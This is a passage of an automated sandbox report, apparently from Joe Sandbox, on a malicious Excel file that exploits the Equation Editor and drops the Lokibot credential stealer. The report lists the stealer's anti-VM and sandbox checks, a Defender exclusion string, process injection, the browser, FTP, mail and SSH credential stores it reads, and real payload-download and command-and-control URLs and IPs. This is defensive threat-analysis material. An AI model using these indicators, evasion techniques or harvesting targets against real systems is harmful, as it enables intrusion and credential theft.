Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior

Source: Shipping-Documents.xlsx

Stream path 'EncryptedPackage' entropy: 7.99980515236 (max. 8.0)

Malware Analysis System Evasion:

Yara detected AntiVM3

Show sources

Source: Yara match	File source: 00000004.00000002.2170739469.0000000002381000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: vbc.exe PID: 2856, type: MEMORY

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Show sources

Source: vbc.exe, 00000004.00000002.2170739469.0000000002381000.00000004.00000001.sdmp	Binary or memory string: WINE_GET_UNIX_FILE_NAME
Source: vbc.exe, 00000004.00000002.2170739469.0000000002381000.00000004.00000001.sdmp	Binary or memory string: SBIEDLL.DLL

Source: C:\Users\Public\vbc.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2684	Thread sleep time: -300000s >= -30000s	Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 2940	Thread sleep time: -104691s >= -30000s	Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 2844	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 2992	Thread sleep time: -60000s >= -30000s	Jump to behavior

Source: C:\Users\Public\vbc.exe

Code function: 5_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,

5_2_00403D74

Source: C:\Users\Public\vbc.exe	Thread delayed: delay time: 104691			Jump to behavior
Source: C:\Users\Public\vbc.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: vbc.exe, 00000004.00000002.2170739469.0000000002381000.00000004.00000001.sdmp	Binary or memory string: vmware
Source: vbc.exe, 00000004.00000002.2170739469.0000000002381000.00000004.00000001.sdmp	Binary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: vbc.exe, 00000004.00000002.2170739469.0000000002381000.00000004.00000001.sdmp	Binary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
Source: vbc.exe, 00000004.00000002.2170739469.0000000002381000.00000004.00000001.sdmp	Binary or memory string: VMware SVGA II!Add-MpPreference -ExclusionPath "
Source: vbc.exe, 00000004.00000002.2170739469.0000000002381000.00000004.00000001.sdmp	Binary or memory string: VMWARE
Source: vbc.exe, 00000004.00000002.2170739469.0000000002381000.00000004.00000001.sdmp	Binary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: vbc.exe, 00000004.00000002.2170739469.0000000002381000.00000004.00000001.sdmp	Binary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
Source: vbc.exe, 00000004.00000002.2170739469.0000000002381000.00000004.00000001.sdmp	Binary or memory string: VMware SVGA II
Source: vbc.exe, 00000004.00000002.2170739469.0000000002381000.00000004.00000001.sdmp	Binary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000

Source: C:\Users\Public\vbc.exe

Process queried: DebugPort

Jump to behavior

Source: C:\Users\Public\vbc.exe

Code function: 5_2_0040317B mov eax, dword ptr fs:[00000030h]

5_2_0040317B

Source: C:\Users\Public\vbc.exe

Code function: 5_2_00402B7C GetProcessHeap,RtlAllocateHeap,

5_2_00402B7C

Source: C:\Users\Public\vbc.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\Public\vbc.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

Injects a PE file into a foreign processes

Show sources

Source: C:\Users\Public\vbc.exe

Memory written: C:\Users\Public\vbc.exe base: 400000 value starts with: 4D5A

Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe			Jump to behavior

Source: C:\Users\Public\vbc.exe	Queries volume information: C:\Users\Public\vbc.exe VolumeInformation	Jump to behavior
Source: C:\Users\Public\vbc.exe	Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\secmod.db VolumeInformation	Jump to behavior
Source: C:\Users\Public\vbc.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\Public\vbc.exe	Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cert8.db VolumeInformation	Jump to behavior
Source: C:\Users\Public\vbc.exe	Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\key3.db VolumeInformation	Jump to behavior

Source: C:\Users\Public\vbc.exe

Code function: 5_2_00406069 GetUserNameW,

5_2_00406069

Source: C:\Users\Public\vbc.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information:

Yara detected Lokibot

Show sources

Source: Yara match	File source: 00000005.00000002.2182198196.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2170925331.0000000003369000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2170739469.0000000002381000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: vbc.exe PID: 2856, type: MEMORY
Source: Yara match	File source: Process Memory Space: vbc.exe PID: 3052, type: MEMORY
Source: Yara match	File source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vbc.exe.355d638.4.raw.unpack, type: UNPACKEDPE

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Show sources

Source: C:\Users\Public\vbc.exe	Key opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\Sessions			Jump to behavior
Source: C:\Users\Public\vbc.exe	Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl			Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Show sources

Source: C:\Users\Public\vbc.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\secmod.db	Jump to behavior
Source: C:\Users\Public\vbc.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\Public\vbc.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini	Jump to behavior
Source: C:\Users\Public\vbc.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\key3.db	Jump to behavior
Source: C:\Users\Public\vbc.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cert8.db	Jump to behavior

Tries to harvest and steal ftp login credentials

Show sources

Source: C:\Users\Public\vbc.exe	File opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\Hosts	Jump to behavior
Source: C:\Users\Public\vbc.exe	File opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccounts	Jump to behavior
Source: C:\Users\Public\vbc.exe	File opened: HKEY_CURRENT_USER\Software\FlashPeak\BlazeFtp\Settings	Jump to behavior
Source: C:\Users\Public\vbc.exe	File opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\Hosts	Jump to behavior

Tries to steal Mail credentials (via file access)

Show sources

Source: C:\Users\Public\vbc.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities			Jump to behavior
Source: C:\Users\Public\vbc.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook			Jump to behavior

Tries to steal Mail credentials (via file registry)

Show sources

Source: C:\Users\Public\vbc.exe	Code function: PopPassword		5_2_0040D069
Source: C:\Users\Public\vbc.exe	Code function: SmtpPassword		5_2_0040D069

Source: Yara match	File source: 00000005.00000002.2182198196.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2170925331.0000000003369000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2170739469.0000000002381000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: vbc.exe PID: 3052, type: MEMORY
Source: Yara match	File source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vbc.exe.355d638.4.raw.unpack, type: UNPACKEDPE

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Exploitation for Client Execution12	Path Interception	Extra Window Memory Injection1	Disable or Modify Tools1	OS Credential Dumping2	Account Discovery1	Remote Services	Archive Collected Data11	Exfiltration Over Other Network Medium	Ingress Tool Transfer15	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Access Token Manipulation1	Deobfuscate/Decode Files or Information11	Credentials in Registry2	File and Directory Discovery2	Remote Desktop Protocol	Man in the Browser1	Exfiltration Over Bluetooth	Encrypted Channel1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Process Injection111	Obfuscated Files or Information31	Security Account Manager	System Information Discovery13	SMB/Windows Admin Shares	Data from Local System2	Automated Exfiltration	Non-Application Layer Protocol3	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Software Packing2	NTDS	Security Software Discovery221	Distributed Component Object Model	Email Collection1	Scheduled Transfer	Application Layer Protocol123	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Extra Window Memory Injection1	LSA Secrets	Virtualization/Sandbox Evasion31	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Masquerading111	Cached Domain Credentials	System Owner/User Discovery1	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Virtualization/Sandbox Evasion31	DCSync	Remote System Discovery1	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Access Token Manipulation1	Proc Filesystem	Network Service Scanning	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	Process Injection111	/etc/passwd and /etc/shadow	System Network Connections Discovery	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
Shipping-Documents.xlsx	41%	Virustotal		Browse
Shipping-Documents.xlsx	31%	ReversingLabs	Document-Office.Exploit.CVE-2017-11882

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\regasm[1].exe	11%	ReversingLabs	ByteCode-MSIL.Backdoor.Androm
C:\Users\Public\vbc.exe	11%	ReversingLabs	ByteCode-MSIL.Backdoor.Androm

Unpacked PE Files

Source	Detection	Scanner	Label	Link	Download
5.2.vbc.exe.400000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen		Download File
4.2.vbc.exe.355d638.4.unpack	100%	Avira	TR/Crypt.XPACK.Gen		Download File

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label
http://103.89.90.94/pzldoc/regasm.exe	0%	Avira URL Cloud	safe
http://kbfvzoboss.bid/alien/fre.php	0%	URL Reputation	safe
http://kbfvzoboss.bid/alien/fre.php	0%	URL Reputation	safe
http://kbfvzoboss.bid/alien/fre.php	0%	URL Reputation	safe
http://alphastand.top/alien/fre.php	0%	URL Reputation	safe
http://alphastand.top/alien/fre.php	0%	URL Reputation	safe
http://alphastand.top/alien/fre.php	0%	URL Reputation	safe
http://63.141.228.141/32.php/S4wFP8QBww9Tp	0%	Avira URL Cloud	safe
http://www.ibsensoftware.com/	0%	URL Reputation	safe
http://www.ibsensoftware.com/	0%	URL Reputation	safe
http://www.ibsensoftware.com/	0%	URL Reputation	safe
http://www.%s.comPA	0%	URL Reputation	safe
http://www.%s.comPA	0%	URL Reputation	safe
http://www.%s.comPA	0%	URL Reputation	safe
http://alphastand.win/alien/fre.php	0%	URL Reputation	safe
http://alphastand.win/alien/fre.php	0%	URL Reputation	safe
http://alphastand.win/alien/fre.php	0%	URL Reputation	safe
http://alphastand.trade/alien/fre.php	0%	URL Reputation	safe
http://alphastand.trade/alien/fre.php	0%	URL Reputation	safe
http://alphastand.trade/alien/fre.php	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

No contacted domains info

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://103.89.90.94/pzldoc/regasm.exe	true	Avira URL Cloud: safe	unknown
http://kbfvzoboss.bid/alien/fre.php	true	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://alphastand.top/alien/fre.php	true	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://63.141.228.141/32.php/S4wFP8QBww9Tp	true	Avira URL Cloud: safe	unknown
http://alphastand.win/alien/fre.php	true	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://alphastand.trade/alien/fre.php	true	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.	vbc.exe, 00000005.00000002.2182608909.0000000002900000.00000002.00000001.sdmp	false		high
http://www.day.com/dam/1.0	A6AB76E0.emf.0.dr	false		high
http://www.ibsensoftware.com/	vbc.exe, vbc.exe, 00000005.00000002.2182198196.0000000000400000.00000040.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.%s.comPA	vbc.exe, 00000005.00000002.2182608909.0000000002900000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	low
https://github.com/georgw777/MediaManager	vbc.exe	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	vbc.exe, 00000004.00000002.2170728064.0000000002361000.00000004.00000001.sdmp	false		high
https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css	vbc.exe, 00000004.00000002.2170739469.0000000002381000.00000004.00000001.sdmp	false		high
https://github.com/georgw777/	vbc.exe	false		high
https://github.com/georgw777/MediaManager;https://github.com/georgw777/	vbc.exe, 00000004.00000000.2161017267.0000000000D02000.00000020.00020000.sdmp, vbc.exe, 00000005.00000000.2168355610.0000000000D02000.00000020.00020000.sdmp, vbc.exe.2.dr	false		high

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
103.89.90.94	unknown	Viet Nam		135905	VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN	true
63.141.228.141	unknown	United States		33387	NOCIXUS	true

General Information

Joe Sandbox Version:	32.0.0 Black Diamond
Analysis ID:	435330
Start date:	16.06.2021
Start time:	12:28:10
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 7m 48s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	Shipping-Documents.xlsx
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed:	6
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.spyw.expl.evad.winXLSX@6/20@0/2
EGA Information:	Failed
HDC Information:	Successful, ratio: 30% (good quality ratio 28.7%) Quality average: 76.7% Quality standard deviation: 29%
HCA Information:	Successful, ratio: 97% Number of executed functions: 107 Number of non-executed functions: 21
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .xlsx Found Word or Excel or PowerPoint or XPS Viewer Attach to Office via COM Scroll down Close Viewer
Warnings:	Show All Exclude process from analysis (whitelisted): dllhost.exe Report size getting too big, too many NtCreateFile calls found. Report size getting too big, too many NtQueryAttributesFile calls found.

Simulations

Behavior and APIs

Time	Type	Description
12:29:11	API Interceptor	93x Sleep call for process: EQNEDT32.EXE modified
12:29:15	API Interceptor	72x Sleep call for process: vbc.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
63.141.228.141	Detalles del pago.pdf___________________________________________________.exe	Get hash	malicious	Browse	63.141.228.141/32.php/hGVMLp0uMVSWM
	RFQ No3756368.exe	Get hash	malicious	Browse	63.141.228.141/32.php/nuldTOn9SBn3G
	Proforma Invoice.exe	Get hash	malicious	Browse	63.141.228.141/32.php/cViU8nooOLcrF
	DHL Receipt_AWB#600595460.exe	Get hash	malicious	Browse	63.141.228.141/32.php/tv9F9tOWmL3Dq
	TDF9XB01IbjiGuv.exe	Get hash	malicious	Browse	63.141.228.141/32.php/qB0GQ2GKLyuOU
	quote.exe	Get hash	malicious	Browse	63.141.228.141/32.php/GsoXa3yQ3p8IH
	Zahtjev za ponudu 15#U00b706#U00b72021#U00b7pdf.exe	Get hash	malicious	Browse	63.141.228.141/32.php/S7zr5v1fXI3Rb
	#U00c1raj#U00e1nlat k#U00e9r#U00e9se 15#U00b706#U00b72021#U00b7pdf.exe	Get hash	malicious	Browse	63.141.228.141/32.php/S7zr5v1fXI3Rb
	Cerere de oferta 15#U00b706#U00b72021#U00b7pdf.exe	Get hash	malicious	Browse	63.141.228.141/32.php/S7zr5v1fXI3Rb
	jO8Tn2nYdJ.exe	Get hash	malicious	Browse	63.141.228.141/32.php/3LJAZguIGMmJV
	socdkv9RSS.exe	Get hash	malicious	Browse	63.141.228.141/32.php/3bi7icv31dccw
	Estatment.exe	Get hash	malicious	Browse	63.141.228.141/32.php/5l0ZnNa7AB6Dl
	Proforma_Valid_Prices_Order no.0193884_doc.exe	Get hash	malicious	Browse	63.141.228.141/32.php/3LJAZguIGMmJV
	SecuriteInfo.com.Variant.MSILHeracles.18248.31707.exe	Get hash	malicious	Browse	63.141.228.141/32.php/NtbXO1knHRe3C
	TNT Shipment Documents.exe	Get hash	malicious	Browse	63.141.228.141/32.php/tv9F9tOWmL3Dq
	QUOTE 1B001.exe	Get hash	malicious	Browse	63.141.228.141/32.php/cUubrzlDZTTbS
	DOC.022000109530000.pdf.exe	Get hash	malicious	Browse	63.141.228.141/32.php/fw2pM7fnRpMCI
	detalles de la transferencia.pdf.exe	Get hash	malicious	Browse	63.141.228.141/32.php/fw2pM7fnRpMCI
	XpQz54zQrMpkJxs.exe	Get hash	malicious	Browse	63.141.228.141/32.php/NtbXO1knHRe3C
	DxMkM6DOH7.exe	Get hash	malicious	Browse	63.141.228.141/32.php/kMB4F28c3jZI6

Domains

No context

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
NOCIXUS	Detalles del pago.pdf___________________________________________________.exe	Get hash	malicious	Browse	63.141.228.141
	RFQ No3756368.exe	Get hash	malicious	Browse	63.141.228.141
	Proforma Invoice.exe	Get hash	malicious	Browse	63.141.228.141
	DHL Receipt_AWB#600595460.exe	Get hash	malicious	Browse	63.141.228.141
	TDF9XB01IbjiGuv.exe	Get hash	malicious	Browse	63.141.228.141
	invoice_sh.html	Get hash	malicious	Browse	63.141.243.99
	quote.exe	Get hash	malicious	Browse	63.141.228.141
	Zahtjev za ponudu 15#U00b706#U00b72021#U00b7pdf.exe	Get hash	malicious	Browse	63.141.228.141
	#U00c1raj#U00e1nlat k#U00e9r#U00e9se 15#U00b706#U00b72021#U00b7pdf.exe	Get hash	malicious	Browse	63.141.228.141
	Cerere de oferta 15#U00b706#U00b72021#U00b7pdf.exe	Get hash	malicious	Browse	63.141.228.141
	jO8Tn2nYdJ.exe	Get hash	malicious	Browse	63.141.228.141
	socdkv9RSS.exe	Get hash	malicious	Browse	63.141.228.141
	Estatment.exe	Get hash	malicious	Browse	63.141.228.141
	Proforma_Valid_Prices_Order no.0193884_doc.exe	Get hash	malicious	Browse	63.141.228.141
